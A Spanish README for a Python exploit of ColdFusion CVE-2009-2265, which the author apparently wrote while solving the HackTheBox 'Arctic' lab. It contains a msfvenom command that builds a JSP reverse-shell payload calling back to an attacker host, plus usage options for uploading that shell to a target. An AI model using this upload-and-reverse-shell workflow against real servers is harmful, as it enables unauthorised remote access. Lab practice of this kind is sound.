
exploit de ColdFusion basado en https://cvedetails.com/cve/CVE-2009-2265/
exploit de coldfusion basado en https://cvedetails.com/cve/CVE-2009-2265/
La razón principal por la que configuré un script en Python para este CVE en particular fue que la versión de Metasploit del mismo no me funcionó cuando intenté resolver la máquina Arctic de HTB. También fue agradable practicar un poco de Python. Sin embargo, existe otra versión en Python de ese mismo exploit creada originalmente por Alexander Reid, si prefieres usar su versión.
El uso es bastante simple:
Asegúrate de tener un archivo de payload creado
por ejemplo, usando msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp
uso: python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
argumentos opcionales:
-h, --help muestra este mensaje de ayuda y sale
-t TARGET dirección IP del objetivo
-p PORT puerto del objetivo
-f FILEPATH ruta del archivo con shellcode a subir
-b BASEPATH basepath de coldfusion